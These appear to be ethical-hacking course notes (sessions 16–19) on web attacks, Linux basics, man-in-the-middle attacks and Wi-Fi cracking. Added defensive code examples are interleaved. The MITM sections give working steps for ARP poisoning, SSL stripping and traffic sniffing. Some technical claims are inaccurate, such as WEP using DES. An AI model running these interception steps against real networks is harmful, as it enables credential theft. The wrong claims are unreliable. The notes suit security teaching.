2598ATTACKER > steals the session id > behaves like the victim and goes to the pnb site > the attacker can replace his/her own session id with the victim's session id, i.e. session id=12354567789, in the same version of the web browser and the same environment.
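An added example (not from the course, PNB or LVS) of the server side of session management: unguessable ids, expiry, rotation on login, and a Set-Cookie line whose HttpOnly flag keeps the id out of document.cookie, which is the read the cookie-stealing section above depends on. The cookie name and lifetime are assumptions.

```python
import secrets
import time

SESSION_TTL = 1800          # seconds of validity; assumption
COOKIE_NAME = "sessionid"   # assumption


class SessionStore:
    def __init__(self):
        self._sessions = {}   # sid -> {"user": ..., "created": ...}

    def create(self, user, now=None):
        """Issue a 256-bit random id; short or sequential ids like the
        '12354567789' in the notes could be guessed or incremented."""
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "created": now}
        return sid

    def lookup(self, sid, now=None):
        """Return the user for a valid, unexpired id, else None."""
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["created"] > SESSION_TTL:
            del self._sessions[sid]
            return None
        return entry["user"]

    def rotate(self, sid, now=None):
        """Replace the id after login or a privilege change, so an id handed
        to the victim before authentication (session fixation) is useless."""
        user = self.lookup(sid, now)
        if user is None:
            return None
        del self._sessions[sid]
        return self.create(user, now)

    def destroy(self, sid):
        """Logout: invalidate server-side, not just clear the browser cookie."""
        self._sessions.pop(sid, None)


def set_cookie_header(sid):
    """HttpOnly hides the value from document.cookie, Secure stops it being
    sent over plain HTTP, SameSite=Lax blocks most cross-site sends."""
    return (f"Set-Cookie: {COOKIE_NAME}={sid}; Path=/; "
            f"Max-Age={SESSION_TTL}; Secure; HttpOnly; SameSite=Lax")
```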
2599
2600----------------------------------------------------------------------------------------------------------------------------------------------------------------------
2601
2602FUNCTIONS on XSS high : onload, onfocus
2603
2604
2605TASK
2606====
26071. hackertest.net
26082. https://xss-game.appspot.com/
26093. DOM Based XSS - 5 queries which will work on web servers.
2610
2611
2612
2613 SESSION 16
2614 ==========
2615
2616CSRF
2617=====
2618CSRF stands for Cross Site Request Forgery (also written Client Site Request Forgery). This is a Web Application attack where an attacker forces an end user to execute unwanted actions on a web application in which they're currently authenticated. The attacker creates his/her own malicious links or pages to trigger the action and lure a victim, and further misuses and steals their data for illegal purposes, which further leads to Identity Theft etc.
2619
2620
2621Eg. a user is already logged into a bank site and clicks on an ad on another malicious website stating "click here to win an iPhone X", which is malicious.
2622
2623Demonstration on LVS and DVWA.
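An added example, not LVS's or DVWA's code: an anti-CSRF token bound to the victim's session with an HMAC and checked on the state-changing request, so a link or page from another site, which carries the session cookie but not the token, is refused. The key, session ids and form fields are constructed.

```python
import hashlib
import hmac
import secrets

# Server-side key; generated per process here, a real app loads it from config.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id):
    """Token = nonce + HMAC(key, session_id:nonce); only the server can mint
    it and it is only valid for the session it was minted for."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_token(session_id, token):
    """Constant-time check of the MAC for the current session."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(session_id, form):
    """State-changing handler: a forged request from another origin arrives
    with the victim's cookie (hence session_id) but cannot carry the token,
    because the attacker's page never saw it."""
    if not verify_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form.get('amount')} to {form.get('to')}"
```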
2624
2625--------------------------------------------------------------------------------------------------------------------------------------------------------------
2626
2627MISSING FUNCTION LEVEL ACCESS CONTROL
2628=====================================
2629
2630Let us first understand what Access Control means.
2631Access Control : access control is a process by which users are granted access and certain privileges to systems, resources or information. The term usually refers to the checks that follow Authentication.
2632
2633Most web applications verify function-level access rights before making that functionality accessible to the user. Missing Function Level Access Control is one of the vulnerabilities on OWASP's Top 10 list and occurs when those function-level checks are insufficient and attackers misuse them.
2634
2635Demonstration on LVS via Unrestricted User Access to the Admin Account.
2636
2637---------------------------------------------------------------------------------------------------------------------------------------------------------------
2638
2639UNVALIDATED REDIRECTS AND FORWARDS
2640===================================
2641Most web applications on the internet frequently redirect and forward users to other pages or other external websites.
2642Unvalidated redirects and forwards means redirecting an authenticated and valid user to a phishing or malicious web page created by the attacker, or using forwards to access unauthorized pages.
2643
2644How to find the redirecting value?
2645There is a redirect_to="url" value in the hyperlinks; this signifies that the URL is redirecting us to a particular link, which may be a malicious one.
2646
2647Demonstration on LVS of Manual Redirects and Automatic Redirects.
2648
2649Demo using Burpsuite.
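An added example (not LVS's code) of validating a redirect_to value before following it: only same-site relative paths or absolute URLs on an allowlisted host are accepted, everything else falls back to a default page. The hostnames and the default target are assumptions.

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"bank.example", "www.bank.example"}   # assumption
DEFAULT_TARGET = "/home"                                # assumption


def safe_redirect_target(redirect_to, default=DEFAULT_TARGET):
    """Return a redirect target that stays on the site, or the default.

    Rejects scheme-relative '//evil.example', backslashes that some browsers
    treat as '/', non-http schemes such as javascript:, and any host not on
    the allowlist (including look-alikes such as bank.example.evil.example
    or user-info tricks such as bank.example@evil.example)."""
    if not redirect_to:
        return default
    value = redirect_to.strip()
    if value.startswith("//") or "\\" in value or "\x00" in value:
        return default
    parts = urlparse(value)
    if parts.scheme == "" and parts.netloc == "" and value.startswith("/"):
        return value                          # plain path on this site
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return value                          # absolute URL on an allowed host
    return default
```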
2650
2651------------------------------------------------------------------------------------------------------------------------------------------------------------
2652
2653CWE
2654====
2655Common Weakness Enumeration (CWE) is a universal online dictionary of weaknesses that have been found in computer software. The purpose of CWE is to facilitate the effective use of tools that can identify, find and resolve bugs, vulnerabilities and exposures in computer software before the programs are publicly distributed or sold.
2656
2657Website - https://cwe.mitre.org/
2658
2659---------------------------------------------------------------------------------------------------------------------------------------------------------------
2660
2661Automated VAPT Tool - NETSPARKER
2662================================
2663
2664Netsparker is a web application security scanner, with support for both detection and exploitation of vulnerabilities. It is like Acunetix, but more advanced and flexible in report generation and in finding vulnerabilities.
2665
2666Demo Application - https://www.netsparker.com/web-vulnerability-scanner/download/
2667
2668Demonstration of Report Generation and explanation on demo.testfire.net via Netsparker.
2669
2670---------------------------------------------------------------------------------------------------------------------------------------------------------------
2671
2672
2673
2674 SESSION 17
2675 ==========
2676
2677INTRODUCTION TO LINUX BASICS
2678============================
2679
2680The word Linux is derived from and evolved out of UNIX.
2681Unix was the first operating system to come into existence with a CLI environment and is mainly used for server-side work as per today's requirements. It is the most flexible and customizable OS, used by skilled individuals.
2682
2683Advantages of using Linux OS
2684=============================
26851. It was very tough to operate, as you need to have some high-end skills to work in this operating system.
2686
26872. Used by Govt officials and private organisations, hence not very popular with general users, because it is more secure.
2688
2689
2690Unix : Server Side OS
2691File Extension : .tar.gz / .deb and other compressed packages
2692Popular OS : Red Hat, Fedora, CENT OS etc.
2693
2694Linux : Is derived from Unix; to engage more (simple) users, Linux was developed under an open source community beginning in 1991 and hence is the most popular non-commercial OS on the planet.
2695
2696File Extension : .tar.gz , .deb etc.
2697Popular OS : Ubuntu Flavours, Linux Mint, Kali OS etc.
2698
2699For Personal/Home Usage : How to Install Kali Linux in VMware.
2700At Work Places : Never Install Kali Linux only use LIVE CD.
2701
2702
2703INTRODUCTION TO PENTESTING OS - KALI
2704=====================================
27051. VirtualBox (VMware)
27062. Kali Linux (Image download : kali.org)
27073. Run it LIVE
27084. Shutdown
2709
2710= Installation of Kali Linux.
2711
2712-----------------------------------------------------------------------------------------
2713
2714DIRECTORIES ARCHITECTURE IN LINUX
2715==================================
2716
27171. /root : This is known as the home directory for the root user. Every single file path in Linux begins from the root in one way or another.
2718
27192. /bin : Binary folder; this is where most of your binary files are stored, typically for the Linux terminal commands and core utilities.
2720
27213. /boot : This is where all the files needed for Linux to boot are kept, which helps in loading the operating system.
2722
27234. /dev : This is where your physical devices are represented; whenever we insert a mouse or any other device via the peripheral ports, it always appears in the dev folder.
2724
27255. /etc : Configuration files specific to the machine are stored in the "/etc" folder. The configuration files of each and every thing present in Linux are stored with ".conf", ".config"
2726etc. extensions.
2727
27286. /home : It is like the "Users" folder in Windows OS, FOR USERS OTHER THAN ROOT. The Desktop, Documents, Downloads, Photos, and Videos folders are all stored under the /home/username directory of each particular user.
2729
27307. /lib : This is where the libraries are kept, which hold the basic utility files for the operations performed in the OS.
2731
27328. /proc : This includes a directory for each running process, including kernel processes, in directories named /proc/PID, where PID is the process number of each process.
2733
27349. /media : Removable Media Devices folder. It is the place where external devices such as USB drives are mounted; it holds and mounts the external devices attached to the machine.
2735
273610. /mnt : This is basically a placeholder folder used for mounting other folders or drives. When we want to mount or place any internal drive or folder in the operating system we will use the "/mnt" folder.
2737
273811. /usr : Contains files and utilities that are shared between users. This folder is used for sharing data and other things between different users on the same OS.
2739
2740Basic Commands of Linux
2741=======================
2742
27431. cd: Changes directories.
2744
27452. ls : List directory
2746
27473. man : To get the manual page of any command or tool.
2748
27494. mkdir : To make a directory in linux
2750
27515. cp : Copy a file to another folder
2752
27536. mv : Move a file to another location
2754
27557. rm : To remove a file only.
2756
27578. rmdir : Remove Directory.
2758
27599. grep : To check whether a word is in a file or not
2760 man grep
2761 grep sairam kar.txt
2762
276310. cat : To read the contents of the file.
2764
276511. locate : To locate the specific file.
2766
276712. echo : For printing something on the terminal.
2768
276913. date : For viewing the current date and time
2770
277114. cal : For displaying the calendar.
2772
277315. uname : Finding out your OS Version.
2774
277516. uname -a : Finding out all the information about the OS, like user information, OS information etc.
2776
277717. init 0 : Shutting down the OS.
2778
277918. reboot : Restarting the OS.
2780
278119. Starting a Python Server : python -m SimpleHTTPServer portnumber
2782
278320. sudo : Sudo allows a system admin to give certain users the ability to run some (or all) commands at the root level and logs all commands and arguments.
2784
278521. ifconfig : Interface configuration and details
2786
278722. iwconfig : Wireless Configuration and details
2788
278923. route -n : Gateway IP Details
2790
279124. apt-get install applicationname : Installation of Application through terminal.
2792
279325. python -m SimpleHTTPServer 4444 : To create a simple server in Linux for transferring files.
2794
2795---------------------------------------------------------------------------------------------------
2796
2797WORDLISTS GENERATOR
2798===================
2799
2800CRUNCH
2801======
2802Usage : TERMINAL : crunch minlength maxlength characterset
2803
2804---------------------------------------------------------------------------------------------------
2805
2806
2807Users and Groups
2808=================
2809
28101. Root account : This is also called the superuser and has complete and unfettered control of the system. A superuser can run any command without any restriction. This user should be assumed to be the system administrator.
2811
28122. System accounts : System accounts are those needed for the operation of system-specific components. These accounts are usually needed for some specific function on your system, and any modifications to them could adversely affect the system.
2813
28143. User accounts : User accounts provide interactive access to the system for users and groups of users. General users are typically assigned to these accounts and usually have limited access to critical system files and directories.
2815
2816
2817Understanding Privileges and Permissions
2818========================================
2819
28201. Read - a readable permission allows the contents of the file to be viewed. A read permission on a directory allows you to list the contents of a directory.
28212. Write - a write permission on a file allows you to modify the contents of that file. For a directory, the write permission allows you to edit the contents of a directory.
28223. Execute - for a file, the executable permission allows you to run the file and execute a program or script. For a directory, the execute permission allows you to change to a different directory and make it your current working directory.
2823
2824= Command : "ls -al" - Show Privileges
2825
2826 -rw-r--r-- 1 root root 25 Sep 5 04:23 confidential.txt
2827
2828In this example, the file owner has read and write permissions only.
2829- The first three characters (rw-) define the owner’s permission to the file.
2830- The next three characters (r--) are the permissions for the members of the same group as the file owner (which in this example is read only).
2831- The last three characters (r--) show the permissions for all other users and in this example it is read only.
2832
2833
2834Command "chmod" : chmod changes the permissions of each given file according to mode, where mode describes the permissions to modify.
2835
2836Syntax : "chmod 754 filename"
2837
2838 4 stands for "read",
2839 2 stands for "write",
2840 1 stands for "execute",
2841and 0 stands for "no permission."
2842
2843Here,
28447 is the combination of permissions 4+2+1 (read, write, and execute)
28455 is 4+0+1 (read, no write, and execute)
2846and 4 is 4+0+0 (read, no write, and no execute)
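The octal arithmetic above carried out in code, as an added example that is not part of the notes: conversion between the ls -al symbolic string and the chmod number in both directions, plus a parser for an ls -al line that flags the permission most worth noticing on a shared host (world-writable). The ls line is the one quoted above.

```python
PERM_BITS = (("r", 4), ("w", 2), ("x", 1))


def symbolic_to_octal(mode):
    """'-rw-r--r--' (or 'rw-r--r--') -> '644'; the leading type char is ignored."""
    perms = mode[-9:]
    if len(perms) != 9:
        raise ValueError("need nine permission characters")
    digits = []
    for start in range(0, 9, 3):       # owner, group, others
        value = 0
        for ch, (letter, bit) in zip(perms[start:start + 3], PERM_BITS):
            if ch == letter:
                value |= bit           # r adds 4, w adds 2, x adds 1
            elif ch != "-":
                raise ValueError(f"unexpected permission character {ch!r}")
        digits.append(str(value))
    return "".join(digits)


def octal_to_symbolic(octal):
    """'754' -> 'rwxr-xr--', i.e. 4+2+1, 4+0+1, 4+0+0."""
    if len(octal) != 3 or not all(c in "01234567" for c in octal):
        raise ValueError("need three octal digits")
    out = []
    for digit in octal:
        n = int(digit)
        out.append("".join(letter if n & bit else "-" for letter, bit in PERM_BITS))
    return "".join(out)


def parse_ls_line(line):
    """Split one 'ls -al' line into the fields the notes explain."""
    fields = line.split(None, 8)
    if len(fields) < 9:
        raise ValueError("not an ls -al line")
    mode, owner, group, name = fields[0], fields[2], fields[3], fields[8]
    octal = symbolic_to_octal(mode)
    others = int(octal[2])
    return {
        "name": name, "owner": owner, "group": group, "octal": octal,
        "world_readable": bool(others & 4),
        "world_writable": bool(others & 2),   # anyone on the host can modify it
    }
```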
2847
2848------------------------------------------------------------------------------------------
2849
2850OWASP ZAP - LINUX TOOL
2851======================
2852The OWASP ZAP (ZAP) tool is one of the most popular free penetration testing tools. It can help you automatically find security vulnerabilities in your web applications, while experienced pentesters can use it for manual security testing. The main goal is to allow easy penetration testing to find vulnerabilities in web applications.
2853
2854ZAP tool in Kali Linux.
2855
2856Steps
2857=====
28581. Adding the Target site to the testing scope.
28592. Setting up Proxy for ZAP. - ZAP tool > Tools Menu > Options > Local Proxy > Change Address = 127.0.0.1 Port = 8080.
2860Setting up the Proxy in the Browser : Mozilla browser > Tools Menu > Options > Advanced tab > Network > Settings > Select Manual Proxy configuration:- HTTP Proxy = 127.0.0.1 Port = 8080.
28613. Attacking the websites through ZAP.
28624. Saving the ZAP Session.
28635. Generating Report = ZAP tool > Report > Generate HTML report > Save and share the report.
2864
2865
2866-----------------------------------------------------------------------------------------
2867
2868
2869
2870 SESSION 18
2871 ==========
2872
2873INTRODUCTION TO NETWORK SECURITY
2874================================
2875
2876Nowadays we get free Wi-Fi and networks at social gathering places, e.g. McDonald's, Indian Railways, airports etc.
2877
2878We get free Wi-Fi, but the data is insecure there. Any malicious person sitting in the network can monitor and watch each and every piece of data being sent on the network.
2879These types of attacks cannot be detected by anyone.
2880
2881Disadvantages of Free WIFI
2882==========================
2883= Cyber Terrorism Activities can be done using some Free WIFI.
2884= DDoS can be done using all the clients connected through the free Wi-Fi.
2885= Unauthorized users like hackers can easily intercept your data by MITM.
2886= Attackers can spread Viruses, worms, and Trojan horses in the whole network.
2887= Data interception and theft and Identity theft etc.
2888
2889
2890MITM
2891=====
2892MITM stands for Man In The Middle attack, in which an intruder sitting inside the network can watch and alter the data, and hence can gather the credential information of the other users sitting inside the network.
2893For performing the attack we need to know the IP address of the target. For getting the IP address of the target, we use some tools for reconnaissance.
2894
2895Tools
2896======
2897
2898Tool for MITM :
2899
2900= Ettercap : Linux-based tool, which is used to perform multiple MITM attacks like ARP Poisoning, DNS Poisoning etc.
2901
2902ARP POISONING ATTACK - ARP Poisoning is a type of cyber attack carried out over a LAN that involves sending malicious ARP packets to a default gateway on a LAN to spoof the IP-to-MAC address table. The ARP protocol translates IP addresses into MAC addresses.
2903
2904STEPS
2905=====
2906
2907ARP POISONING
2908==============
2909= ettercap -G (-G for the graphical version)
2910= Click on "Sniff" and then "Unified sniffing"
2911= Select the interface
2912= Go to Hosts and "Scan for hosts" to scan all the hosts of the network.
2913= Hosts > "Host List"
2914= Check for the default gateway (router's IP) with "route -n"
2915= Select the gateway as "Add to Target 1"
2916= Select the target machine as "Add to Target 2"
2917= Further proceed to MITM and click on "ARP Poisoning"
2918= Click on "Sniff Remote Connections"
2919= Go to MITM and click on "ARP Poisoning" (Address Resolution Protocol)
2920= Click on "Start Sniffing"
2921
2922But the limitation is that it only works on HTTP websites.
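From the defender's side, as an added example that is not part of the notes or of Ettercap: detection of the poisoning just described from a log of ARP replies, flagging an IP whose MAC changes (especially the gateway) and a MAC that answers for more than one IP, plus a parser that feeds the same check from `arp -n` or `ip neigh` output. The reply log and table text are constructed.

```python
import re
from collections import defaultdict

# Constructed ARP reply log: (seconds, sender IP, sender MAC). The last two
# entries are what a poisoning run looks like from a monitoring host.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # gateway, legitimate
    (1.0, "192.168.1.10", "aa:bb:cc:00:00:10"),  # a client
    (2.0, "192.168.1.1", "AA:BB:CC:00:00:99"),   # gateway IP now claimed by another MAC
    (3.0, "192.168.1.10", "aa:bb:cc:00:00:99"),  # same MAC also answers for the client
]

# One IPv4 address followed somewhere on the line by a colon-separated MAC.
ARP_LINE = re.compile(r"(\d+\.\d+\.\d+\.\d+).*?([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})")


def parse_arp_table(text, ts=0.0):
    """Turn 'arp -n' or 'ip neigh' output into (ts, ip, mac) triples;
    header lines without an address pair are skipped."""
    return [(ts, m.group(1), m.group(2))
            for m in map(ARP_LINE.search, text.splitlines()) if m]


def detect_arp_spoofing(replies, gateway_ip=None):
    """Return a list of (timestamp, message) alerts.

    Two signals: an IP whose MAC changes after first being seen, and one MAC
    that claims several IPs, which is the signature of a host inserting
    itself between the gateway and a client. A static ARP entry for the
    gateway is the usual host-side mitigation once this fires."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            tag = " [gateway]" if ip == gateway_ip else ""
            alerts.append((ts, f"{ip}{tag} moved from {previous} to {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            claimed = ", ".join(sorted(mac_to_ips[mac]))
            alerts.append((ts, f"{mac} answers for multiple IPs: {claimed}"))
    return alerts
```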
2923
2924For performing MITM on HTTPS with SSL Stripping
2925===============================================
2926
2927SSLStrip is a type of MITM attack that forces a victim's browser into communicating with an adversary in plain text over HTTP, while the adversary proxies the modified content from an HTTPS server.
2928In short, we convert the HTTPS website into HTTP, which means we can even watch the passwords of HTTPS websites.
2929
2930Steps
2931=====
2932terminal > echo "1" > /proc/sys/net/ipv4/ip_forward
2933terminal > nano /etc/ettercap/etter.conf
2934 = Find the iptables line in the conf file > copy and apply it as given in the next step.
2935terminal > iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
2936terminal > sslstrip -l 8080
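The control that blunts this downgrade on the browser side, as an added example not from the course: parsing a Strict-Transport-Security header and deciding whether a browser that has already seen it would refuse the plain-HTTP connection the stripping step needs. The response header sets and the minimum age are constructed assumptions.

```python
def parse_hsts(value):
    """'max-age=31536000; includeSubDomains; preload' -> dict of directives."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            key, val = part.split("=", 1)
            directives[key.strip().lower()] = val.strip().strip('"')
        else:
            directives[part.lower()] = True
    return directives


def hsts_protects(headers, min_age=15552000):
    """True if the response pins the host to HTTPS for at least min_age seconds
    (180 days here, an assumption). Header names match case-insensitively.
    The very first visit is still unprotected unless the host is on the
    browsers' preload list, which is the window a downgrade relies on."""
    lowered = {k.lower(): v for k, v in headers.items()}
    value = lowered.get("strict-transport-security")
    if value is None:
        return False
    directives = parse_hsts(value)
    try:
        max_age = int(directives.get("max-age", 0))
    except (TypeError, ValueError):
        return False
    return max_age >= min_age


# Constructed response header sets for a site with and without the policy.
SECURE_HEADERS = {"Strict-Transport-Security": "max-age=31536000; includeSubDomains",
                  "Content-Type": "text/html"}
DOWNGRADEABLE_HEADERS = {"Content-Type": "text/html"}
```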
2937
2938DNS Poisoning, or DNS spoofing, is a form of computer security hacking which behaves like a Man in the Middle: corrupt Domain Name System data is spoofed by the attacker, who then intercepts the data.
2939
2940
2941
2942For Getting the Images :
2943> TERMINAL : driftnet
2944
2945For Getting the URL :
2946> TERMINAL : urlsnarf
2947
2948------------------------------------------------------------------------------------------
2949
2950Another Tool for MITM - Bettercap and Xerosploit
2951=================================================
2952
2953Bettercap V1. - git clone https://github.com/evilsocket/bettercap
2954Xerosploit - git clone https://github.com/LionSec/xerosploit
2955
2956------------------------------------------------------------------------------------------
2957
2958---------------------------------------------------------------------
2959
2960Xerosploit - Use replace for changing the images.
2961
2962
2963
2964 SESSION 19
2965 ===========
2966
2967Wireless Networks are the networks which don't need to connect to any Network Peripheral. For eg. Bluetooths, WIFI etc. These Wireless Network came into existence because when we were using physical networks, it was very difficult to maintain and to spend expenses on various physical mediums required for establishing connection with end users used in Physical Network. Physical Medium includes Switches, Hubs, Cables, Connections, and Maintenances etc.
2968
2969WIFI ALLIANCE - Organization
2970
2971For using these Wireless Networks, there is an standard which sets Rules and Regulations to use Wireless Networks for using Internet named as "IEEE 802.11" .
2972
2973 They derive a term known as WIFI, which means Wireless Fidelity.
2974
2975IEEE 802.11 carries out the action of WIFI via a router having DHCP built into it. The first company to come out with this wireless router technology was DLINK.
2976
2977Need Of Wireless Security
2978=========================
2979Nowadays every smart device uses wireless networking. If a wireless network is not secured, it will lead to manipulation and illegal use of all the devices connected to that network.
2980Unauthorized users like hackers can easily intercept your data by MITM.
2981An attacker can spread viruses, worms and Trojan horses across the whole network.
2982Data interception and theft, identity theft etc.
2983
2984--------------------------
2985
2986Due to such security breaches, there is a vast need for wireless security. The wireless security standards are as follows :
2987
2988WEP (Wired Equivalent Privacy) came in year 1997
2989WPA (WiFi Protected Access) came in year 2003
2990WPA 2 WIFI Protected Access with AES/CCMP came in year 2004
2991
2992WEP (Wired Equivalent Privacy)
2993==============================
2994WEP was designed to give wireless networks the equivalent level of privacy protection as a comparable wired network, but technical flaws greatly limit its use. Consumers who purchased 802.11b/g routers in the early 2000s had no practical Wi-Fi security options available other than WEP. WEP uses the RC4 ALGORITHM and DES encryption, which is easy to break. The problem with WEP is that the key is static, which is vulnerable: by using some tools a hacker could use reverse-engineering to extract the encryption key. This process affects the transmission speed.
2995
2996WPA (WiFi Protected Access)
2997============================
2998It was developed in response to the weaknesses of WEP, and therefore improves on WEP's authentication and encryption features. WPA makes it more secure by adding extra security mechanisms and algorithms to stop unauthorized access. WPA delivers a level of security way beyond anything that WEP can offer. WPA needs the support of RADIUS (Remote Authentication Dial-in User Service) servers, which help in authentication of the users.
2999
3000WPA 2 (WIFI Protected Access with AES/CCMP)
3001============================================
3002WPA2 is the same as WPA; the only difference is that it provides stronger encryption than WEP through the use of either of two standard technologies: Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES) with Pre-Shared Keys (PSK).
3003
3004
3005ENCRYPTIONS
3006=============
3007
3008AES : The Advanced Encryption Standard, or AES, is a symmetric block cipher chosen by the U.S. government to protect classified information, passphrases and other things using symmetric key algorithm.
3009
3010DES : The Data Encryption Standard (DES) is an outdated symmetric-key method of data encryption. DES works by using the same key to encrypt and decrypt a message, so both the sender and the receiver must know and use the same private key.
3011
3012TKIP : Temporal Key Integrity Protocol is an encryption protocol included as part of the IEEE 802.11 standard for wireless LANs (WLANs).
3013
3014PSK : A pre-shared key is a secret shared between the two parties over some secure channel before it is used. PSK is used in Wi-Fi encryption such as Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA), where the method is called WPA-PSK or WPA2-PSK.
3015
3016CCMP : Counter Mode Cipher Block Chaining Message Authentication Code Protocol is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality which was created to address the vulnerabilities presented by WEP, a dated, insecure protocol.
3017
3018
3019
3020SECURITY CONFIGURATIONS
3021=========================
3022
3023Keeping password security strong and possibly unbreakable
3024
3025
3026chillypannerr@234 c#i77YP4n333@234
3027
3028 Use minimum 8 characters as the password
3029 Use alphabet in both cases > pASSwOrD
3030 Use number in the password > p3$$w0rd
3031 Use special character. Eg. - a-@ , e-3, h-# etc.
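The four rules above written as a checker, with a rough entropy estimate showing why length matters more than single substitutions. This is an added example, not part of the original notes; the guess rate in guesses_seconds is a constructed assumption.

```python
from __future__ import annotations

import math
import string

# Rules from the notes: at least 8 characters, both letter cases, a digit and a special character.
MIN_LENGTH = 8
SPECIALS = frozenset(string.punctuation)


def check_password(password: str) -> list[str]:
    """Return the names of the rules the password fails; an empty list means it passes all of them."""
    failures = []
    if len(password) < MIN_LENGTH:
        failures.append("min_length")
    if not any(c.islower() for c in password):
        failures.append("lowercase")
    if not any(c.isupper() for c in password):
        failures.append("uppercase")
    if not any(c.isdigit() for c in password):
        failures.append("digit")
    if not any(c in SPECIALS for c in password):
        failures.append("special")
    return failures


def charset_size(password: str) -> int:
    """Size of the union of standard character classes that the password draws from."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(c in SPECIALS for c in password):
        size += len(SPECIALS)  # 32 printable ASCII punctuation characters
    return size


def entropy_bits(password: str) -> float:
    """Upper-bound guessing entropy: log2(charset_size ** length).

    This assumes every character was chosen uniformly at random. A dictionary
    word with swaps such as a->@ or e->3 is far weaker than this number
    suggests, because cracking wordlists apply exactly those substitutions as
    rules; adding length is what raises the bound reliably.
    """
    size = charset_size(password)
    return len(password) * math.log2(size) if size else 0.0


def guesses_seconds(password: str, guesses_per_second: float = 1e9) -> float:
    """Worst-case seconds to exhaust the space at a constructed (assumed) guess rate."""
    return 2 ** entropy_bits(password) / guesses_per_second


if __name__ == "__main__":
    for candidate in ("pASSwOrD", "p3$$w0rd", "chillypannerr@234", "c#i77YP4n333@234"):
        print(candidate, check_password(candidate) or "ok", round(entropy_bits(candidate), 1), "bits")
```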
3032
3033
3034Website - https://howsecureismypassword.net/
3035
3036
3037
3038WIFI HANDSHAKE
3039===============
3040The four-way handshake is designed so that the access point (or authenticator) and wireless client (or supplicant) can independently prove to each other that they are authenticated and correct.
3041
3042= The Access Point sends the Nonce(used only once) Packet to the Client.
3043= The Client uses the Nonce Packet for the Authentication process.
3044= The AP responds with Broadcasting, Multicasting Messages of Authentication.
3045= The Client accepts the broadcasting packet and responds with Acknowledgement Packet (ACK) which helps in further connecting to the AP.
3046
3047
3048
3049CAPTURING WIRELESS COMMUNICATION PACKETS
3050==========================================
3051
3052Attacker’s Machine - Kali OS
3053Device Used - Leoxsys External WIFI Adapter - 150HGN : https://www.amazon.in/Leoxsys-150Mbps-Wireless-external-LEO-HG150N/dp/B00IWT1JA6/ref=sr_1_1?ie=UTF8&qid=1529569817&sr=8-1&keywords=leoxsys
3054Tool - Airmon-ng , Airodump-ng (Non-Graphical)
3055
3056
3057Modes of Using a Wireless Adapter :
3058
3059= Standard Mode | Managed Mode : The mode which every layman uses to access the services of a particular Access Point.
3060
3061= Monitoring Mode : The mode which allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network.
3062
3063TERMINOLOGIES
3064===============
3065Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
3066#Data : Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
3067#/s : Number of data packets per second measured over the last 10 seconds.
3068CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
3069MB : Maximum speed supported by the AP. The dot (after 54 above) indicates short preamble is supported. 'e' indicates that the network has QoS (802.11e) enabled.
3070ENC : Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
3071CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
3072AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
3073WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates the version supported.
3074ESSID : The name of the AP.
3075BSSID : MAC Address of the Access Point.
3076
3077DEMONSTRATION
3078===============
3079
3080Opening up Kali Machine and using tools.
3081
3082
3083REQUIREMENTS FOR CRACKING WIRELESS NETWORKS
3084============================================
3085
3086OS : Kali Linux
3087Hardware Components : Wireless Adapter that supports Monitor Mode (Using "Leoxsys 150 HGN")
3088Tools : (CLI Tools Pre-Installed in Kali Linux)
3089- Airmon-ng : For Enabling Monitor Mode.
3090- Airodump-ng : For Dumping Wireless Fidelity Packets.
3091- Aireplay-ng : For generating frames/packets and tampering with network packets.
3092- Aircrack-ng : For doing a brute force attack on the captured WIFI packets with the help of a wordlist.
3093
3094
3095Aireplay-ng
3096============
3097Aireplay-ng is used to inject/replay frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications etc.
3098
3099
3100Aircrack-ng
3101===========
